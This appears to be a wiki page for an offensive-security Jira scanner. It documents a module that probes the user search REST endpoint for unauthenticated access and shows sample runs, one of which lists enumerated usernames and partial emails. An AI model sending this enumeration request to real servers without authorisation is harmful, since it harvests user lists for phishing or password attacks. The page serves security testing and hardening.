Unauthenticated Access to User Search API - carnal0wnage/J-PWN GitHub Wiki

Unauthenticated Access to User Search API

Category: Information Disclosure

module name: check_unauthenticated_user_search

url: /rest/api/2/user/search?username=.&maxResults=1000

INFO: Checking for Unauthenticated Access to User Search API
[Testing URL]: https://JIRA/rest/api/2/user/search?username=.&maxResults=1000
- HTTP 200 but empty response 
- HTTP Code: 200

INFO: Checking for Unauthenticated Access to User Search API
[Testing URL]: http://JIRASERVER/rest/api/2/user/search?username=.&maxResults=1000
[+] [INFO DISCLOSURE] Unauthenticated Access to User Search: http://JIRASERVER/rest/api/2/user/search?username=.&maxResults=1000

  User Details Found:
    - Username: alice
      Email: alice@
      Display Name: <removed>
      Active: True
    - Username: bob
      Email: bob@
      Display Name: <removed>
      Active: True
    - Username: charles
      Email: charles@
      Display Name: <removed>
      Active: True
    - Username: diana
      Email: diana@
      Display Name: <removed>
      Active: True
<SNIP>

INFO: Checking for Unauthenticated Access to User Search API
[Testing URL]: http://JIRASERVER/rest/api/2/user/search?username=.&maxResults=1000
- No Unauthenticated Access to User Search Found
- HTTP Code: 401

INFO: Checking for Unauthenticated Access to User Search API
[Testing URL]: https://JIRASERVER/rest/api/2/user/search?username=.&maxResults=1000
- No Unauthenticated Access to User Search Found
- HTTP Code: 404

References:

⚠️ **GitHub.com Fallback** ⚠️